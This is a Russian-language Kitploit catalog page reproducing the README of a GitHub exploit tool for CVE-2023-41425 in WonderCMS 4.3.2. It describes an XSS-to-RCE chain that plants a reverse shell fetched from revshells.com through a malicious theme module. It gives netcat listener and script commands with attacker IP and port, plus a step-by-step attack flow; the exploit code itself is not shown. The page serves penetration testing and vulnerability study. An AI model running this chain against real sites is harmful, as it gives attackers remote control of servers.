Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425 — CVE-2023-41425 Refurbish | Kitploit
Инструменты/GitHubGitHub/0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425
Генерация полезной нагрузкиЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHub0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425

WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425

CVE-2023-41425 Refurbish

Репозиторий
71 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

WonderCMS 4.3.2 — эксплойты XSS to RCE

Обзор

Данные скрипты эксплуатируют уязвимость межсайтового скриптинга (XSS) в WonderCMS 4.3.2 для достижения удалённого выполнения кода (RCE). XSS-полезная нагрузка при срабатывании у администратора автоматически устанавливает обратную оболочку на целевой сервер с помощью сфабрикованного вредоносного модуля темы. Обратная оболочка загружается с revshells.com и выполняется, предоставляя атакующему удалённый доступ к серверу.


Содержание

  • Предварительные требования
  • Скрипт 1: автоматический эксплойт
    • Возможности
    • Использование
  • Скрипт 2: ручной эксплойт
    • Возможности
    • Использование
  • Примечания
  • Лицензия

Предварительные требования

Для успешного запуска любого из скриптов необходимы следующие инструменты и условия:

  1. Bash-оболочка: оба скрипта написаны для Linux-окружений с использованием Bash.
  2. netcat (nc): используется для прослушивания соединения обратной оболочки.
  3. Python3: простой HTTP-сервер на Python используется для размещения XSS-нагрузки.
  4. WonderCMS 4.3.2: целевая система должна работать под управлением уязвимой версии WonderCMS.
  5. Взаимодействие администратора: нагрузка требует, чтобы администратор инициировал XSS, что приводит к выполнению обратной оболочки.
  6. revshells.com: полезная нагрузка обратной оболочки динамически загружается с revshells.com.

Скрипт 1: автоматический эксплойт

POC

Pasted image 20241010021603

Возможности

Данная версия эксплойта автоматически проверяет активность слушателя nc, загружает обратную оболочку, запускает HTTP-сервер, отправляет нагрузку и ожидает, когда администратор инициирует обратную оболочку.

  • Автоматическая настройка обратной оболочки: загружает предварительно сгенерированную обратную оболочку с revshells.com.
  • Внедрение XSS-нагрузки: внедряет XSS-нагрузку в контактную форму цели.
  • Управление HTTP-сервером: автоматически запускает HTTP-сервер на Python для размещения полезной нагрузки обратной оболочки.
  • Проверка слушателя nc: убеждается, что слушатель запущен, прежде чем продолжить.
  • Автоматическая отправка нагрузки: отправляет нагрузку автоматически без взаимодействия с пользователем.

Использование

  1. Убедитесь, что слушатель nc запущен на указанном порту:
    nc -nvlp <PORT>
    
  2. Запустите скрипт следующей командой:
    ./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
    
    Пример:
    ./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

Последовательность действий

  1. Загрузка обратной оболочки: скрипт загружает обратную оболочку с revshells.com.
  2. Изменение обратной оболочки: скрипт обновляется с IP-адресом и портом атакующего.
  3. Создание ZIP-нагрузки: создаётся ZIP-файл, содержащий обратную оболочку.
  4. Формирование XSS-нагрузки: генерируется XSS-нагрузка, устанавливающая обратную оболочку, и внедряется в уязвимую контактную форму.
  5. Автозапуск HTTP-сервера: скрипт запускает HTTP-сервер на Python для обслуживания вредоносной нагрузки.
  6. Автоматическая отправка нагрузки: XSS-нагрузка автоматически отправляется администратору.

Скрипт 2: ручной эксплойт

POC

Pasted image 20241010013048

Используйте эксплойт, предоставленный скриптом, в поле «Website»…

Pasted image 20241010013218

Возможности

Эта версия требует, чтобы пользователь вручную управлял слушателем nc и инициировал XSS-нагрузку. Она больше подходит для сценариев, где автоматические процессы нежелательны.

  • Ручная настройка обратной оболочки: пользователь отвечает за запуск слушателя.
  • Ручное инициирование XSS: скрипт предоставляет вредоносную ссылку для отправки администратору, но нагрузка должна быть инициирована вручную.
  • Управление HTTP-сервером: запускает HTTP-сервер на Python для размещения XSS-нагрузки.

Использование

  1. Убедитесь, что слушатель nc запущен на указанном порту:
    nc -nvlp <PORT>
    
  2. Запустите скрипт следующей командой:
    ./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
    
    Пример:
    ./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

Последовательность действий

  1. Загрузка обратной оболочки: загружает обратную оболочку с revshells.com.
  2. Изменение обратной оболочки: обновляет обратную оболочку с IP-адресом и портом атакующего.
  3. Создание ZIP-нагрузки: создаёт ZIP-файл, содержащий обратную оболочку.
  4. Формирование XSS-нагрузки: генерирует XSS-нагрузку, которая устанавливает обратную оболочку.
  5. Отображение вредоносной ссылки: показывает ссылку, которую необходимо отправить администратору для инициирования.
  6. Запуск HTTP-сервера: запускает HTTP-сервер на Python для размещения нагрузки.

Примечания

  • Взаимодействие администратора: оба эксплойта полагаются на то, что администратор WonderCMS инициирует XSS-нагрузку, посетив уязвимую страницу. После срабатывания устанавливается обратная оболочка с машиной атакующего.
  • Firewall/IDS/IPS: соблюдайте осторожность при запуске этих эксплойтов в средах, защищённых межсетевыми экранами или системами обнаружения вторжений (IDS), которые могут блокировать подозрительную активность или выдавать предупреждения.
  • Ответственное раскрытие: если вы обнаружите, что цель уязвима, всегда следуйте этическим рекомендациям и сообщайте об уязвимости соответствующим сторонам.
Скачать инструмент